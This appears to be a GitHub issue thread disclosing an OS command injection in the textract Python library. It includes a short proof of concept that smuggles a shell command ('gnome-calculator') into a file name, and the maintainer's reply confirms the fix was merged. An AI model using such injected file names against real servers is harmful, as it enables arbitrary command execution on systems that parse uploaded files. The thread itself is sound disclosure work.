### ISSUE TITLE
Security Vulnerability

### ISSUE THREAD

**Issue by pierre-ernst** [deanmalmgren/textract#125]
I hate to drop that but I couldn't get any traction otherwise:
I found an OS command injection back in June and I contributed a fix in [PR 114](https://github.com/deanmalmgren/textract/pull/114)

Parsing a file with a malicious name leads to arbitrary OS command injection, this is especially risky when parsing user-supplied files on a server (e.g. uploaded files)

import textract
import sys
import os

# create a file with a malicious name and arbitrary content
fileName = './test";gnome-calculator;#.pdf'
file = open(fileName,'w+')
file.write('Pierre Ernst, Salesforce')
file.close()

# parse newly created file
text = textract.process(fileName)
print text

# cleanup
os.remove(fileName);

**Comment by deanmalmgren** [comment]
Thanks for bringing this to everyone's attention @pierre-ernst. I just merged in #114 which you put together to address this.
